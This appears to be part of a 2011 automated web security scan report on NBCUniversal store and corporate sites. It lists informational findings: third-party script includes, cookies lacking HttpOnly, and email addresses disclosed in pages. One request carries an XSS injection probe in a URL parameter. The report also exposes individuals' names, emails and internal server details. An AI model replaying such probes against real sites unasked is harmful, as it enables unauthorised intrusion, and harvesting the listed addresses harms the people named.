HTTP/1.1 200 OK Server: Apache Vary: Accept-Encoding Content-Length: 68387 Content-Type: text/html Expires: Mon, 15 Aug 2011 22:21:04 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 15 Aug 2011 22:21:04 GMT Connection: close Set-Cookie: DACART=deleted; expires=Sun, 15-Aug-2010 22:21:03 GMT; path=/; domain=nbcuniversalstore.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://w...[SNIP]... </script> <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"> </script>...[SNIP]... <iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/nbc;tile=5;sz=246x100;ord=1313446864?" width=246 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no"><script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=5;sz=246x100;abr=!ie;ord=1313446864?"> </script>...[SNIP]... <iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;ord=1313446864?" width=726 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no"><script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;abr=!ie;ord=1313446864?"> </script>...[SNIP]... <div id="contentHolder"> <script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"> </script>...[SNIP]... </script> <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=deliveryagent"> </script>...[SNIP]... <iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/nbc;tile=7;sz=246x100;ord=1313446864?" width=246 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no"><script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=7;sz=246x100;abr=!ie;ord=1313446864?"> </script>...[SNIP]... <iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/nbc;tile=8;sz=726x100;ord=1313446864?" width=726 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no"><script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=8;sz=726x100;abr=!ie;ord=1313446864?"> </script>...[SNIP]... </script><script language="JavaScript" src="http://edge.aperture.displaymarketplace.com/displayscript.js?liveConClientID=4157529279552&PixelID=127&EventType=view&PageID=27"> </script>...[SNIP]... </script><script language="javascript" src="http://nbcuniversalstore.resultspage.com/autosuggest/searchbox_suggest_v1.js" type="text/javascript"> </script>...[SNIP]...
4.18. http://www.nbcuniversalstore.com/the-office-2012-day-to-day-calendar/detail.php
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.nbcuniversalstore.com
Path:
/the-office-2012-day-to-day-calendar/detail.php
Issue detail
The response dynamically includes the following scripts from other domains:http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=5;sz=246x100;abr=!ie;ord=1313446846? http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=7;sz=246x100;abr=!ie;ord=1313446846? http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=8;sz=726x100;abr=!ie;ord=1313446846? http://ad.doubleclick.net/adj/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;abr=!ie;ord=1313446846? http://api.recaptcha.net/js/recaptcha_ajax.js http://connect.facebook.net/en_US/all.js http://edge.aperture.displaymarketplace.com/displayscript.js?liveConClientID=4157529279552&PixelID=127&EventType=view&PageID=27 http://nbcuniversalstore.resultspage.com/autosuggest/searchbox_suggest_v1.js http://s7.addthis.com/js/250/addthis_widget.js
Request
GET /the-office-2012-day-to-day-calendar/detail.php?p=303756%0087e46%3balert(1)//dbde9cd2c5d&v=nbc_the-office HTTP/1.1 Host: www.nbcuniversalstore.com Proxy-Connection: keep-alive Referer: http://www.nbcuniversalstore.com/?v=nbc_the-office User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESSID=faa2b376751236c89d563cadebeadde6; DASHORTNAME=nbcuniversalstore; DAABTEST=B; WRUID=0; s_pers=%20gpv_pageName%3DNBCUniversal%2520Store%253ANBCUniversal%2520Store%253ANBC%253AThe%2520Office%253ACategory%7C1313448476137%3B; s_sess=%20s_cc%3Dtrue%3B%20s_eVar2%3Dnbcu_homepage_flash_the-office_show_button%3B%20s_sq%3Ddelagentnbc%252Cdelagentglobalrollup%253D%252526pid%25253DNBCUniversal%25252520Store%2525253ANBCUniversal%25252520Store%2525253ANBC%2525253AThe%25252520Office%2525253ACategory%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.nbcuniversalstore.com/%2525253Fv%2525253Dnbc_the-office%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Server: Apache Vary: Accept-Encoding Content-Length: 68334 Content-Type: text/html Expires: Mon, 15 Aug 2011 22:20:46 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 15 Aug 2011 22:20:46 GMT Connection: close Set-Cookie: DACART=qK2mk5eRnKeppoaV; expires=Tue, 13-Dec-2011 22:20:46 GMT; path=/; domain=nbcuniversalstore.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://w...[SNIP]... </script> <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"> </script>...[SNIP]... <iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/nbc;tile=5;sz=246x100;ord=1313446846?" width=246 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no"><script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=5;sz=246x100;abr=!ie;ord=1313446846?"> </script>...[SNIP]... <iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;ord=1313446846?" width=726 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no"><script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;abr=!ie;ord=1313446846?"> </script>...[SNIP]... <div id="contentHolder"> <script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"> </script>...[SNIP]... </script> <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=deliveryagent"> </script>...[SNIP]... <iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/nbc;tile=7;sz=246x100;ord=1313446846?" width=246 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no"><script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=7;sz=246x100;abr=!ie;ord=1313446846?"> </script>...[SNIP]... <iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/nbc;tile=8;sz=726x100;ord=1313446846?" width=726 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no"><script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=8;sz=726x100;abr=!ie;ord=1313446846?"> </script>...[SNIP]... </script><script language="JavaScript" src="http://edge.aperture.displaymarketplace.com/displayscript.js?liveConClientID=4157529279552&PixelID=127&EventType=view&PageID=27"> </script>...[SNIP]... </script><script language="javascript" src="http://nbcuniversalstore.resultspage.com/autosuggest/searchbox_suggest_v1.js" type="text/javascript"> </script>...[SNIP]...
4.19. http://www.nbcuniversalstore.com/the-office-dundie-award/detail.php
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.nbcuniversalstore.com
Path:
/the-office-dundie-award/detail.php
Issue detail
The response dynamically includes the following scripts from other domains:http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=5;sz=246x100;abr=!ie;ord=1313446678? http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=7;sz=246x100;abr=!ie;ord=1313446678? http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=8;sz=726x100;abr=!ie;ord=1313446678? http://ad.doubleclick.net/adj/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;abr=!ie;ord=1313446678? http://api.recaptcha.net/js/recaptcha_ajax.js http://connect.facebook.net/en_US/all.js http://edge.aperture.displaymarketplace.com/displayscript.js?liveConClientID=4157529279552&PixelID=127&EventType=view&PageID=27 http://nbcuniversalstore.resultspage.com/autosuggest/searchbox_suggest_v1.js http://s7.addthis.com/js/250/addthis_widget.js
Request
GET /the-office-dundie-award/detail.php?p=44960&v=nbc_the-office HTTP/1.1 Host: www.nbcuniversalstore.com Proxy-Connection: keep-alive Referer: http://www.nbcuniversalstore.com/?v=nbc_the-office User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESSID=faa2b376751236c89d563cadebeadde6; DASHORTNAME=nbcuniversalstore; DAABTEST=B; WRUID=0; s_pers=%20gpv_pageName%3DNBCUniversal%2520Store%253ANBCUniversal%2520Store%253ANBC%253AThe%2520Office%253ACategory%7C1313448476137%3B; s_sess=%20s_cc%3Dtrue%3B%20s_eVar2%3Dnbcu_homepage_flash_the-office_show_button%3B%20s_sq%3Ddelagentnbc%252Cdelagentglobalrollup%253D%252526pid%25253DNBCUniversal%25252520Store%2525253ANBCUniversal%25252520Store%2525253ANBC%2525253AThe%25252520Office%2525253ACategory%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.nbcuniversalstore.com/%2525253Fv%2525253Dnbc_the-office%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Server: Apache Vary: Accept-Encoding Content-Length: 163119 Content-Type: text/html Expires: Mon, 15 Aug 2011 22:17:58 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 15 Aug 2011 22:17:58 GMT Connection: close Set-Cookie: DACART=deleted; expires=Sun, 15-Aug-2010 22:17:57 GMT; path=/; domain=nbcuniversalstore.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://w...[SNIP]... </script> <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"> </script>...[SNIP]... <iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/nbc;tile=5;sz=246x100;ord=1313446678?" width=246 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no"><script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=5;sz=246x100;abr=!ie;ord=1313446678?"> </script>...[SNIP]... <iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;ord=1313446678?" width=726 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no"><script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;abr=!ie;ord=1313446678?"> </script>...[SNIP]... <div id="contentHolder"> <script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"> </script>...[SNIP]... </script> <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=deliveryagent"> </script>...[SNIP]... <iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/nbc;tile=7;sz=246x100;ord=1313446678?" width=246 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no"><script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=7;sz=246x100;abr=!ie;ord=1313446678?"> </script>...[SNIP]... <iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/nbc;tile=8;sz=726x100;ord=1313446678?" width=726 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no"><script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=8;sz=726x100;abr=!ie;ord=1313446678?"> </script>...[SNIP]... </script><script language="JavaScript" src="http://edge.aperture.displaymarketplace.com/displayscript.js?liveConClientID=4157529279552&PixelID=127&EventType=view&PageID=27"> </script>...[SNIP]... </script><script language="javascript" src="http://nbcuniversalstore.resultspage.com/autosuggest/searchbox_suggest_v1.js" type="text/javascript"> </script>...[SNIP]...
5. Cookie without HttpOnly flag set
previous
next
There are 4 instances of this issue:
Issue background
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive. You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
5.1. http://www.nbcuniversalstore.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.nbcuniversalstore.com
Path:
/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:DACART=deleted; expires=Sun, 15-Aug-2010 22:17:07 GMT; path=/; domain=nbcuniversalstore.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.nbcuniversalstore.com Proxy-Connection: keep-alive Referer: http://search.nbcuni.com/search?q=xss User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache Vary: Accept-Encoding Content-Length: 89483 Content-Type: text/html Expires: Mon, 15 Aug 2011 22:17:09 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 15 Aug 2011 22:17:09 GMT Connection: closeSet-Cookie: DACART=deleted; expires=Sun, 15-Aug-2010 22:17:07 GMT; path=/; domain=nbcuniversalstore.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://...[SNIP]...
5.2. http://www.nbcuniversalstore.com/cart.php
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.nbcuniversalstore.com
Path:
/cart.php
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:DACART=qK2mk5eRnKeppoaV; expires=Tue, 13-Dec-2011 22:18:22 GMT; path=/; domain=nbcuniversalstore.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
POST /cart.php?p=303756 HTTP/1.1 Host: www.nbcuniversalstore.com Proxy-Connection: keep-alive Referer: http://www.nbcuniversalstore.com/the-office-2012-day-to-day-calendar/detail.php?p=303756&v=nbc_the-office Content-Length: 25 Origin: http://www.nbcuniversalstore.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Content-type: application/x-www-form-urlencoded; charset=UTF-8 Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESSID=faa2b376751236c89d563cadebeadde6; DASHORTNAME=nbcuniversalstore; DAABTEST=B; WRUID=0; s_pers=%20gpv_pageName%3DNBCUniversal%2520Store%253ANBCUniversal%2520Store%253ANBC%253AThe%2520Office%253AThe%2520Office%25202012%2520Day%2520to%2520Day%2520Calendar%253ADetail%7C1313448508383%3B; s_sess=%20s_eVar2%3Dnbcu_homepage_flash_the-office_show_button%3B%20s_cc%3Dtrue%3B%20s_sq%3Ddelagentnbc%252Cdelagentglobalrollup%253D%252526pid%25253DNBCUniversal%25252520Store%2525253ANBCUniversal%25252520Store%2525253ANBC%2525253AThe%25252520Office%2525253AThe%25252520Office%252525202012%25252520Day%25252520to%25252520Day%25252520Calendar%2525253ADetail%252526pidt%25253D1%252526oid%25253Djavascript%2525253AcheckSkuQty%25252528%25252529%2525253Bif%25252528%25252524defined%25252528AjaxCart%25252529%25252529AjaxCart.add%25252528%25252527303756%25252527%2525252C%25252527add_form%25252527%2525252C%25252520true%25252529%2525253B%252526ot%25253DA%3B is_ajax=1&id=303756&qty=1
Response
HTTP/1.1 200 OK Server: Apache Vary: Accept-Encoding Content-Length: 2074 Content-Type: text/html Expires: Mon, 15 Aug 2011 22:18:22 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 15 Aug 2011 22:18:22 GMT Connection: closeSet-Cookie: DACART=qK2mk5eRnKeppoaV; expires=Tue, 13-Dec-2011 22:18:22 GMT; path=/; domain=nbcuniversalstore.com <div id="ajaxCartTitle">Shopping Cart</div> <script type="text/javascript"> document.cookie = "last_p_added=303756;expires=Fri, 31 Dec 2099 23:59:59 GMT;"; </script> <div id="ajaxCartCou...[SNIP]...
5.3. http://www.nbcuniversalstore.com/the-office-2012-day-to-day-calendar/detail.php
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.nbcuniversalstore.com
Path:
/the-office-2012-day-to-day-calendar/detail.php
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:DACART=deleted; expires=Sun, 15-Aug-2010 22:17:57 GMT; path=/; domain=nbcuniversalstore.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /the-office-2012-day-to-day-calendar/detail.php?p=303756&v=nbc_the-office HTTP/1.1 Host: www.nbcuniversalstore.com Proxy-Connection: keep-alive Referer: http://www.nbcuniversalstore.com/?v=nbc_the-office User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESSID=faa2b376751236c89d563cadebeadde6; DASHORTNAME=nbcuniversalstore; DAABTEST=B; WRUID=0; s_pers=%20gpv_pageName%3DNBCUniversal%2520Store%253ANBCUniversal%2520Store%253ANBC%253AThe%2520Office%253ACategory%7C1313448476137%3B; s_sess=%20s_cc%3Dtrue%3B%20s_eVar2%3Dnbcu_homepage_flash_the-office_show_button%3B%20s_sq%3Ddelagentnbc%252Cdelagentglobalrollup%253D%252526pid%25253DNBCUniversal%25252520Store%2525253ANBCUniversal%25252520Store%2525253ANBC%2525253AThe%25252520Office%2525253ACategory%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.nbcuniversalstore.com/%2525253Fv%2525253Dnbc_the-office%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Server: Apache Vary: Accept-Encoding Content-Length: 68244 Content-Type: text/html Expires: Mon, 15 Aug 2011 22:17:58 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 15 Aug 2011 22:17:58 GMT Connection: closeSet-Cookie: DACART=deleted; expires=Sun, 15-Aug-2010 22:17:57 GMT; path=/; domain=nbcuniversalstore.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://w...[SNIP]...
5.4. http://www.nbcuniversalstore.com/the-office-dundie-award/detail.php
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.nbcuniversalstore.com
Path:
/the-office-dundie-award/detail.php
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:DACART=deleted; expires=Sun, 15-Aug-2010 22:17:57 GMT; path=/; domain=nbcuniversalstore.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /the-office-dundie-award/detail.php?p=44960&v=nbc_the-office HTTP/1.1 Host: www.nbcuniversalstore.com Proxy-Connection: keep-alive Referer: http://www.nbcuniversalstore.com/?v=nbc_the-office User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESSID=faa2b376751236c89d563cadebeadde6; DASHORTNAME=nbcuniversalstore; DAABTEST=B; WRUID=0; s_pers=%20gpv_pageName%3DNBCUniversal%2520Store%253ANBCUniversal%2520Store%253ANBC%253AThe%2520Office%253ACategory%7C1313448476137%3B; s_sess=%20s_cc%3Dtrue%3B%20s_eVar2%3Dnbcu_homepage_flash_the-office_show_button%3B%20s_sq%3Ddelagentnbc%252Cdelagentglobalrollup%253D%252526pid%25253DNBCUniversal%25252520Store%2525253ANBCUniversal%25252520Store%2525253ANBC%2525253AThe%25252520Office%2525253ACategory%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.nbcuniversalstore.com/%2525253Fv%2525253Dnbc_the-office%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Server: Apache Vary: Accept-Encoding Content-Length: 163119 Content-Type: text/html Expires: Mon, 15 Aug 2011 22:17:58 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 15 Aug 2011 22:17:58 GMT Connection: closeSet-Cookie: DACART=deleted; expires=Sun, 15-Aug-2010 22:17:57 GMT; path=/; domain=nbcuniversalstore.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://w...[SNIP]...
6. Email addresses disclosed
previous
next
There are 5 instances of this issue:
Issue background
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content. However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
6.1. http://www.nbcuni.com/corporate/newsroom/major-league-soccer-and-nbc-sports-group-announce-multi-year-partnership
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.nbcuni.com
Path:
/corporate/newsroom/major-league-soccer-and-nbc-sports-group-announce-multi-year-partnership
Issue detail
The following email addresses were disclosed in the response:Dan.courtemanche@MLSsoccer.com Meier.Raivich@nbcuni.com adam.freifeld@nbcuni.com
Request
GET /corporate/newsroom/major-league-soccer-and-nbc-sports-group-announce-multi-year-partnership HTTP/1.1 Host: www.nbcuni.com Proxy-Connection: keep-alive Referer: http://search.nbcuni.com/search?q=game User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|271DF814851D048A-60000137600077B3[CE]; s_cc=true; s_nr=1313446650249; s_sq=nbcuglobal%2Cnbcucorporated%2Cnbcunbcuniversalbu%3D%2526pid%253DNBCUniversal%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.nbcuni.com%25252Fcorporate%25252Fnewsroom%25252Fmajor-league-soccer-and-nbc-sports-group-announce-multi-yea%2526ot%253DA
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.10 X-Powered-By: PHP/5.2.10 Pragma: no-cache X-Pingback: http://www.nbcuni.com/wordpress/xmlrpc.php Last-Modified: Mon, 15 Aug 2011 22:17:24 GMT Vary: Accept-Encoding Wirt: qw-p-wordpress02.qwplatform.com Content-Length: 22224 Content-Type: text/html; charset=UTF-8 Pool-Info: pool_wordpress_prod 66.77.88.181 80 Cache-Control: no-cache, must-revalidate Expires: Mon, 15 Aug 2011 22:17:24 GMT Date: Mon, 15 Aug 2011 22:17:24 GMT Connection: close <!DOCTYPE html> <html dir="ltr" lang="en-US"> <head> <meta charset="UTF-8" /> <script> var template_directory = 'http://www.nbcuni.com/wordpress/wp-content/themes/theme-nbcuni'; var widgetname = '';...[SNIP]... <br />Dan.courtemanche@MLSsoccer.com <br />...[SNIP]... <br /> e: Meier.Raivich@nbcuni.com <br />...[SNIP]... <br /> e: adam.freifeld@nbcuni.com <br />...[SNIP]...
6.2. http://www.nbcuni.com/wordpress/wp-content/themes/theme-nbcuni/_js/jQuery.inlinePager.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.nbcuni.com
Path:
/wordpress/wp-content/themes/theme-nbcuni/_js/jQuery.inlinePager.js
Issue detail
The following email address was disclosed in the response:cristiana.yambo@nbcuni.com
Request
GET /wordpress/wp-content/themes/theme-nbcuni/_js/jQuery.inlinePager.js HTTP/1.1 Host: www.nbcuni.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.nbcuni.com/
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.10 Last-Modified: Wed, 04 May 2011 19:57:04 GMT ETag: "17dc1b8-2f77-4a278a91f0400" Accept-Ranges: bytes Content-Length: 12151 Wirt: qw-p-wordpress03.qwplatform.com Content-Type: application/javascript Pool-Info: pool_wordpress_prod 66.77.88.182 80 Cache-Control: max-age=300 Expires: Mon, 15 Aug 2011 22:18:49 GMT Date: Mon, 15 Aug 2011 22:13:49 GMT Connection: close /* * jQuery.inlinePager. pagination plugin * * Copyright (c) 2010 NBCUDPS * * Maintained by Cristiana Yambo * cristiana.yambo@nbcuni.com * * Launch : January 2010 * Version : 1.1 * Released: May 24, 2010 1.1: added className on numbered pagination LI's */ //takes a list and makes an animated paginated list with optional easin...[SNIP]...
6.3. http://www.nbcuni.com/wordpress/wp-content/themes/theme-nbcuni/_js/jquery.paginator.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.nbcuni.com
Path:
/wordpress/wp-content/themes/theme-nbcuni/_js/jquery.paginator.js
Issue detail
The following email address was disclosed in the response:
Request
GET /wordpress/wp-content/themes/theme-nbcuni/_js/jquery.paginator.js HTTP/1.1 Host: www.nbcuni.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.nbcuni.com/
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.10 Last-Modified: Wed, 04 May 2011 19:57:04 GMT ETag: "17dc1f7-38ba-4a278a91f0400" Accept-Ranges: bytes Content-Length: 14522 Wirt: qw-p-wordpress02.qwplatform.com Content-Type: application/javascript Pool-Info: pool_wordpress_prod 66.77.88.181 80 Cache-Control: max-age=300 Expires: Mon, 15 Aug 2011 22:18:49 GMT Date: Mon, 15 Aug 2011 22:13:49 GMT Connection: close /*------------------------------------------------- // Quick Pager jquery plugin // Created by dan and emanuel @geckonm.com updated by Scott Nath scott.nath@nbcuni.com // // v1.2 // Feb 2, 2011 - added "trigger_page_hash" option to allow back-button functionality //------------------------------------------------- */ (function($) { $.fn.selectPage = function...[SNIP]...
6.4. http://www.nbcuniversalstore.com/js/omniture/s_code_dageneral.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.nbcuniversalstore.com
Path:
/js/omniture/s_code_dageneral.js
Issue detail
The following email address was disclosed in the response:
Request
